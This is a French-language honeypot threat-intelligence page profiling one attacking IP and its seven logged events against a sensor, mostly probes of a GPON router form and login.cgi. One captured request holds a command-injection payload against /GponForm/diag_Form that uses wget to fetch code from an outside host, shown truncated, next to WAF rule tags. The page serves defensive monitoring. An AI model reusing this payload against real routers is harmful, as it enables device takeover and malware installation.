Profil de menace
Activité suspecte — risque 81/100 (Élevé) — MITRE T1059 — confiance 100 % — via HTTP
Activité suspecte — risque 81/100 (Élevé) — MITRE T1059 — confiance 100 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance 100 % — Score WAF 100 · 7 tag(s) WAF
ASN 219502 · 94.154.43.0/24 · RIPENCC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 7 événements sur la période pour cette IP.
Même FAI Storm Industries LLC — corrélation indicative.
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
7 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
7 événement(s) — page 1/1
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8080 · HTTP | http | Scan vulnérabilités scanner vuln · via HTTP:8080 · (sonde / probe) · → /GponForm/diag_Form | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /GponForm/diag_Form
Émulateur
HTTP
WAF
6
Recommandation
Surveiller
Tags
Cible HTTP
GET
/GponForm/diag_Form
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/GponForm/diag_Form
Service
HTTP
Pourquoi cette classification : Tags WAF: nosqli-3 · confiance 46%
Confiance classification
46%
Confiance modérée — signal unique
Risque capteur
Moyen
· 45
Confiance : Confiance 46 % — Motif catalogue confirmé · 1 tag(s) WAF
Protocole émulé
1
Signaux
pat-0230
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
Probe /GponForm/diag_Form
Ligne de requête
User-Agent
—
Règles WAF
nosqli-3
Payload (extrait)
GET /GponForm/diag_Form?images/ HTTP/1.1 Host: 62.3.50.33:8080 Connection: close |
|||||||
| TCP | 8080 · HTTP | http | Injection de commande cmd injection · via HTTP:8080 · (tentative d'exploit) · → /GponForm/diag_Form | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /GponForm/diag_Form UA Mozilla/5.0
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
POST
/GponForm/diag_Form
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8080
Chemin / cible
/GponForm/diag_Form
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0144
pat-0145
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932190
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Probe /GponForm/diag_Form
Ligne de requête
User-Agent
Mozilla/5.0
Règles WAF
lfi-12
lfi-14
rce-0
rce-2
ssrf-3
nosqli-3
Payload (extrait)
POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 62.3.50.33:8080 Content-Type: application/x-www-form-urlencoded Content-Lengt
Requête brute (extrait)
POST /GponForm/diag_Form?images/ HTTP/1.1 Host: 62.3.50.33:8080 Content-Type: application/x-www-form-urlencoded Content-Length: 124 Connection: close User-Agent: Mozilla/5.0 XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://94 |
|||||||
| TCP | 8080 · HTTP | http | SSRF ssrf attack · via HTTP:8080 · (tentative d'exploit) | Élevée | Moyen · 58 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like…
Émulateur
HTTP
WAF
22
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8080
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Règle WAF « ssrf-3 » · confiance 50%
Confiance classification
50%
Confiance modérée — signal unique
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Règles WAF
rce-0
ssrf-3
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Referer: http://62.3.50.33:8080/ |
|||||||
| TCP | 81 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:81 · (sonde / probe) · → login.cgi | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET login.cgi
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
login.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
login.cgi
Service
HTTP
Pourquoi cette classification : Type « web_probe » (signaux protocolaires) · confiance 74%
Confiance classification
74%
Risque capteur
Moyen
· 40
Confiance : Confiance 74 % — Score WAF 8
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
—
Payload (extrait)
GET login.cgi HTTP/1.1 |
|||||||
| TCP | 81 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:81 · (sonde / probe) · → login.cgi | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET login.cgi
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
login.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
login.cgi
Service
HTTP
Pourquoi cette classification : Type « web_probe » (signaux protocolaires) · confiance 74%
Confiance classification
74%
Risque capteur
Moyen
· 40
Confiance : Confiance 74 % — Score WAF 8
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
—
Payload (extrait)
GET login.cgi HTTP/1.1 |
|||||||
| TCP | 81 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:81 · (sonde / probe) · → login.cgi | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET login.cgi
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
login.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
login.cgi
Service
HTTP
Pourquoi cette classification : Type « web_probe » (signaux protocolaires) · confiance 74%
Confiance classification
74%
Risque capteur
Moyen
· 40
Confiance : Confiance 74 % — Score WAF 8
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
—
Payload (extrait)
GET login.cgi HTTP/1.1 |
|||||||
| TCP | 81 · HTTP | http | Sonde HTTP Sonde HTTP · via HTTP:81 · (sonde / probe) · → login.cgi | Élevée | Moyen · 40 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET login.cgi
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
GET
login.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
login.cgi
Service
HTTP
Pourquoi cette classification : Type « web_probe » (signaux protocolaires) · confiance 74%
Confiance classification
74%
Risque capteur
Moyen
· 40
Confiance : Confiance 74 % — Score WAF 8
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
—
Règles WAF
—
Payload (extrait)
GET login.cgi HTTP/1.1 |
|||||||